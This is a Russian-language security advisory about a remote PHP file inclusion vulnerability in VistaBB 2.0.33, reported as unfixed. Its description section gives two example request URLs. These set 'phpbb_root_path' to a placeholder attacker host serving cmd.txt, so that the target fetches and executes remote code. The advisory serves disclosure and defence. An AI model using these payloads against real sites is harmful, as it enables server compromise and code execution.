PHP-инклюдинг в VistaBB

Дата публикации:
28.08.2006
Дата изменения:
17.10.2006
Всего просмотров:
1983
Опасность:
Высокая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
VistaBB 2.x
Уязвимые версии: VistaBB 2.0.33, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "phpbb_root_path" в сценариях includes/functions_mod_user.php и includes/functions_portal.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[site]/[vistabbpath]/includes/functions_mod_user.php?phpbb_root_path=http://yoursite.com/cmd.txt?
http://[site]/[vistabbpath]/includes/functions_portal.php?phpbb_root_path=http://yoursite.com/cmd.txt?

URL производителя: www.vistabb.net

Решение: Способов устранения уязвимости не существует в настоящее время.

Ссылки: VistaBB <= 2.x Multiple File Inclusion Vulnerabilities

или введите имя

CAPTCHA